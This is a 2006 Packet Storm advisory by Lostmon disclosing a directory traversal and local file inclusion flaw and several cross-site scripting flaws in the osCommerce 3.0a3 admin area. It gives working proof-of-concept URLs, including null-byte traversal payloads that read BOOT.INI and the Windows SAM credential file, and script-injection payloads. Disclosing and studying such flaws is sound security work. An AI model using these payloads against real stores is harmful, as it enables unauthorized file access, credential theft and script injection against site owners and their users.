osc303.txt

2006-12-07T00:00:00
ID PACKETSTORM:52835
Type packetstorm
Reporter Lostmon
Modified 2006-12-07T00:00:00

Description

                                        
                                            `############################################  
Oscommerce traversal arbitrary file access  
Vendor:http://www.oscommerce.com/about/news,125  
Advisore:http://lostmon.blogspot.com/2006/12  
/oscommerce-traversal-arbitrary-file.html  
Vendor notify:NO Exploit available: YES  
###########################################  
  
osCommerce contains a flaw that allows a remote traversal  
arbitrary file access.This flaw exists because the application  
does not validate filter variable upon submission to  
admin/templates_boxes_layout.php script.This could allow a  
remote authenticated administrator to create a specially  
crafted URL that would execute '../' directory traversal  
characters to view files on the target system with  
the privileges of the target web service.  
  
  
  
####################  
versions  
####################  
  
Oscommerce 3.0a3  
  
  
###################  
SOLUTION  
###################  
  
No solution was available at this time.  
  
  
################  
timeline  
################  
  
Discovered:11-11-2006  
vendor notify:-----  
vendor response:----  
disclosure:07-12-2006  
  
#################  
Examples  
#################  
  
######################  
traversal file access  
######################  
  
wen we try to open  
  
http://localhost/oscommerce/admin/templates_boxes_layout.php?  
set=boxes&filter=[SOME WORD]&lID=27  
  
the aplication returns a full path disclosure and  
returns this error:  
  
Warning: require(includes/templates/[SOME WORD].php) [function.require]:  
failed to open stream: No such file or directory in C:\AppServ\www\  
oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13  
  
Fatal error: require() [function.require]: Failed opening required  
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')  
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_  
boxes_layout.php on line 13  
  
the aplication add the .php extension to our [SOME WORD] ummm  
and it searh for the file in a folder inside webserver  
we can include any php file located on the web server  
in the aplication and it is executed(local file inclusion)  
  
http://[victim]/admin/templates_boxes_layout.php?  
set=boxes&filter=../../our_evil_php_file&lID=27  
  
if we try to read a file outside webserver folder with a non php  
extension can try for test this...  
  
&filter=../../../../file.extension%00 for look for example boot.ini  
in a windows system  
  
http://localhost/oscommerce/admin/templates_boxes_layout.php?  
set=boxes&filter=../../../../BOOT.INI%00&lID=27  
  
http://localhost/oscommerce/admin/templates_boxes_layout.php?  
set=content&filter=../../../../windows/repair/sam%00&lID=27  
  
#####################  
Cross site scripting  
#####################  
  
http://localhost/oscommerce/admin/modules.php?set=shipping  
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E  
  
http://localhost/definitiva/admin/customers.php?selected_box=customers  
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E  
  
http://localhost/oscommerce/admin/languages_definitions.php?lID=1  
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E  
  
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT  
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product  
  
  
######################## €nd #####################  
  
Thnx to Estrella to be my ligth.  
  
--   
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
--  
La curiosidad es lo que hace mover la mente....  
`